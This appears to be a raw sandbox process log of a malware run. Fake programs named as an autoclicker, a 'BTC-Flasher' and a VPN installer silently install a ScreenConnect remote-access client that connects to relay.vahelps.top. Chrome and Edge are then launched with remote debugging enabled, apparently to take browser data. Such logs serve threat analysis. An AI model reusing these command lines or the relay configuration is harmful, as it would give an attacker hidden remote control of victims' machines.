2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=AUTOCLICKER"
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "74267e91-e11f-4f86-a437-bf8e66deae5a" "User"
C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe
"C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 58C4699C69D4AA893D4A4F40DCBA4615 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI21CB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241312296 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3C6B355A5EF4EFC2CF598C26657793FE
C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe
"C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2768315ABA567584EAF240F4AFC1A088 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI88F1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241338671 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding FEEA12BC835B17E2AD65B7C8798CE3AF
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2F42ED5C44A32EA13B385C84E3F86E24 E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=BTC-FLASHER"
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "27f58587-14d5-42fd-bfbb-98030a75155c" "User"
C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe
"C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 26B8DDF1ED94A63CE5B26EE23F81610F C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSICF57.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241487796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 534679E3EBFC08C3DC704D3B0233A5D1
C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe
"C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 59D8D72F1287F91E0BE7C7C04C28CA83 C
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI16EF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241506109 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C418B454B32A423B899570F451D93DD4
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1E80FE38758CB1456AB64F2E6DB7A23D E Global\MSI0000
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=FREE_VPN"
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
"C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "5fb28501-c747-48d3-ac4b-586971fcfd21" "User"
C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe
"C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications
C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe
"C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe81f8cc40,0x7ffe81f8cc4c,0x7ffe81f8cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=1732 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2116,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=2148 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=2404 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3184 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3332,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3316 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4524 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4660,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3604 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4688,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4780 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4932 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5072,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4768 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4896 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4496,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4884 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe81f93cb8,0x7ffe81f93cc8,0x7ffe81f93cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1972 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2116 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2032 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
